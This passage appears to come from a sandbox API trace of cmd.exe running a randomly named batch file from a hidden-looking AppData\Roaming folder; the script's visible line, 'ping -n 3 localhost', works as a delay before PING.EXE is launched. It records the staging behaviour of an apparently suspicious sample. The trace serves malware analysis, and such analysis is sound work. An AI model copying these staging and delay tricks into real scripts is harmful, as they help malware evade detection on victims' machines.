returned 0x4 [0099.544] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.544] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.545] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0099.545] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0099.545] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0099.545] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0099.545] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0099.545] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0099.545] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0099.545] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") 
returned 3 [0099.545] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16fa90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0099.545] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16fa90, lpFilePart=0x16fa8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16fa8c*="Desktop") returned 0x18 [0099.545] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0099.545] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f80c | out: lpFindFileData=0x16f80c) returned 0x1affe0 [0099.545] FindClose (in: hFindFile=0x1affe0 | out: hFindFile=0x1affe0) returned 1 [0099.545] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f80c | out: lpFindFileData=0x16f80c) returned 0x1affe0 [0099.545] FindClose (in: hFindFile=0x1affe0 | out: hFindFile=0x1affe0) returned 1 [0099.545] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f80c | out: lpFindFileData=0x16f80c) returned 0x1affe0 [0099.545] FindClose (in: hFindFile=0x1affe0 | out: hFindFile=0x1affe0) returned 1 [0099.545] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0099.546] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0099.546] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0099.546] GetEnvironmentStringsW () returned 0x1b0150* [0099.546] FreeEnvironmentStringsW (penv=0x1b0150) returned 1 [0099.546] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0099.547] GetConsoleOutputCP () returned 0x1b5 [0099.548] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0099.548] GetUserDefaultLCID () returned 0x409 [0099.548] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fbd0, cchData=128 | out: lpLCData="0") returned 2 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fbd0, cchData=128 | out: lpLCData="0") returned 2 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fbd0, cchData=128 | out: lpLCData="1") returned 2 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0099.548] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0099.549] GetConsoleTitleW (in: lpConsoleTitle=0x1b01e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 
0x76910000 [0099.549] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0099.549] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0099.549] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0099.553] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd", _String2=")") returned 58 [0099.553] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd") returned 3 [0099.553] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd") returned 3 [0099.553] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd") returned 6 [0099.553] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd") returned 6 [0099.553] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd") returned 15 [0099.553] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd") returned 15 [0099.554] GetConsoleTitleW (in: lpConsoleTitle=0x16f8c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.554] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.554] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.554] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f684, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f67c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f67c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0099.554] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0099.554] SetErrorMode (uMode=0x0) 
returned 0x0 [0099.554] SetErrorMode (uMode=0x1) returned 0x0 [0099.554] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x1bdc08, lpFilePart=0x16f3e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x16f3e8*="vMfCCeRYkvQy") returned 0x2d [0099.554] SetErrorMode (uMode=0x0) returned 0x1 [0099.554] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0099.555] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.558] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.558] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd", fInfoLevelId=0x1, lpFindFileData=0x16f184, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f184) returned 0x1b08f0 [0099.558] FindClose (in: hFindFile=0x1b08f0 | out: hFindFile=0x1b08f0) returned 1 [0099.558] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0099.558] GetConsoleTitleW (in: lpConsoleTitle=0x16f65c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.559] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0099.561] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0099.561] IdentifyCodeAuthzLevelW () returned 0x1 [0099.567] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0099.567] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0099.567] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0099.567] CloseCodeAuthzLevel () returned 0x1 [0099.568] SetErrorMode (uMode=0x0) returned 0x0 [0099.568] SetErrorMode (uMode=0x1) returned 0x0 [0099.568] GetFullPathNameW 
(in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd", nBufferLength=0x104, lpBuffer=0x1b04e8, lpFilePart=0x16f548 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd", lpFilePart=0x16f548*="2btKHTzb.cmd") returned 0x3a [0099.568] SetErrorMode (uMode=0x0) returned 0x1 [0099.568] CmdBatNotification () returned 0x0 [0099.811] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\2btkhtzb.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f58c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0099.811] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0099.811] _get_osfhandle (_FileHandle=3) returned 0x58 [0099.811] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.811] _get_osfhandle (_FileHandle=3) returned 0x58 [0099.811] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.811] ReadFile (in: hFile=0x58, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f570, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x16f570*=0x91, lpOverlapped=0x0) returned 1 [0099.812] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0099.812] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=21, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0099.812] _get_osfhandle (_FileHandle=3) returned 0x58 [0099.812] GetFileType (hFile=0x58) returned 0x1 [0099.812] _get_osfhandle (_FileHandle=3) returned 0x58 [0099.812] SetFilePointer (in: hFile=0x58, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0099.813] _wcsicmp (_String1="ping", _String2=")") returned 71 [0099.813] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0099.813] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0099.813] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0099.813] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0099.813] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0099.813] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0099.814] _tell (_FileHandle=3) returned 21 [0099.814] _close (_FileHandle=3) returned 0 [0099.814] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f344 | out: _Buffer="\r\n") returned 2 [0099.814] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.814] GetFileType (hFile=0x7) returned 0x2 [0099.814] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.814] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f304 | out: lpMode=0x16f304) returned 1 [0099.814] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.814] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f330, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f330*=0x2) returned 1 [0099.814] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0099.814] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0099.814] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x16f340 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0099.815] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x16f340 | out: _Buffer=">") returned 1 [0099.815] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.815] GetFileType (hFile=0x7) 
returned 0x2 [0099.815] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.815] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f308 | out: lpMode=0x16f308) returned 1 [0099.815] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.815] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x16f334, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x16f334*=0x19) returned 1 [0099.815] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.815] GetFileType (hFile=0x7) returned 0x2 [0099.815] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.815] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f58c | out: lpMode=0x16f58c) returned 1 [0099.815] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.815] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1b0958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x16f5b8, lpReserved=0x0 | out: lpBuffer=0x1b0958*, lpNumberOfCharsWritten=0x16f5b8*=0x4) returned 1 [0099.816] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16f5c4 | out: _Buffer=" -n 3 localhost ") returned 16 [0099.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.816] GetFileType (hFile=0x7) returned 0x2 [0099.816] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.816] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f584 | out: lpMode=0x16f584) returned 1 [0099.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.816] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x16f5b0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f5b0*=0x10) returned 1 [0099.816] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f5e4 | out: _Buffer="\r\n") returned 2 [0099.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.816] GetFileType (hFile=0x7) returned 0x2 [0099.816] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 
[0099.816] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f5a4 | out: lpMode=0x16f5a4) returned 1 [0099.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.816] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f5d0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f5d0*=0x2) returned 1 [0099.816] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0099.816] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0099.816] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0099.817] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0099.817] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0099.817] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0099.817] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0099.817] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0099.817] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0099.817] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0099.817] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0099.817] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0099.817] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0099.817] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0099.817] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0099.817] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0099.817] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0099.817] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0099.817] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0099.817] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0099.817] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0099.817] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0099.817] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0099.817] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0099.817] 
_wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0099.817] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0099.817] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0099.817] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0099.817] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0099.817] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0099.817] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0099.817] _wcsicmp (_String1="ping", _String2="START") returned -3 [0099.817] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0099.817] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0099.817] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0099.817] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0099.817] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0099.817] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0099.817] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0099.817] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0099.817] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0099.817] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0099.817] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0099.818] SetErrorMode (uMode=0x0) returned 0x0 [0099.818] SetErrorMode (uMode=0x1) returned 0x0 [0099.818] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1c0550, lpFilePart=0x16f388 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f388*="Desktop") returned 0x18 [0099.818] SetErrorMode (uMode=0x0) returned 0x1 [0099.818] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.818] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0099.818] GetEnvironmentVariableW (in: 
lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.818] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x16f104, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f104) returned 0xffffffff [0099.819] GetLastError () returned 0x2 [0099.819] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x16f104, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f104) returned 0xffffffff [0099.819] GetLastError () returned 0x2 [0099.819] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x16f104, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f104) returned 0x1c0838 [0099.819] FindClose (in: hFindFile=0x1c0838 | out: hFindFile=0x1c0838) returned 1 [0099.819] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x16f104, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f104) returned 0xffffffff [0099.819] GetLastError () returned 0x2 [0099.819] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x16f104, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f104) returned 0x1c0838 [0099.849] FindClose (in: hFindFile=0x1c0838 | out: hFindFile=0x1c0838) returned 1 [0099.849] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0099.849] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0099.849] GetConsoleTitleW (in: lpConsoleTitle=0x16f154, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.850] SetErrorMode (uMode=0x0) returned 0x0 [0099.850] SetErrorMode (uMode=0x1) returned 0x0 [0099.850] GetFullPathNameW (in: lpFileName=".", 
nBufferLength=0x208, lpBuffer=0x1c0a98, lpFilePart=0x16ec74 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16ec74*="Desktop") returned 0x18 [0099.850] SetErrorMode (uMode=0x0) returned 0x1 [0099.850] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.850] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0099.850] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.850] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x16e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e9f0) returned 0xffffffff [0099.850] GetLastError () returned 0x2 [0099.850] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x16e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e9f0) returned 0xffffffff [0099.850] GetLastError () returned 0x2 [0099.850] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x16e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e9f0) returned 0x1c0d80 [0099.850] FindClose (in: hFindFile=0x1c0d80 | out: hFindFile=0x1c0d80) returned 1 [0099.850] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x16e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e9f0) returned 0xffffffff [0099.851] GetLastError () returned 0x2 [0099.851] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x16e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x16e9f0) returned 0x1c0d80 [0099.851] FindClose (in: hFindFile=0x1c0d80 | out: hFindFile=0x1c0d80) returned 1 [0099.851] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0099.851] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0099.851] GetConsoleTitleW (in: lpConsoleTitle=0x16eee8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.851] InitializeProcThreadAttributeList (in: lpAttributeList=0x16ed70, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16ee38 | out: lpAttributeList=0x16ed70, lpSize=0x16ee38) returned 1 [0099.851] UpdateProcThreadAttribute (in: lpAttributeList=0x16ed70, dwFlags=0x0, Attribute=0x60001, lpValue=0x16ee30, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16ed70, lpPreviousValue=0x0) returned 1 [0099.851] GetStartupInfoW (in: lpStartupInfo=0x16ed2c | out: lpStartupInfo=0x16ed2c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0099.851] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0099.852] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16edcc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16ee18 | out: lpCommandLine="ping -n 3 localhost", 
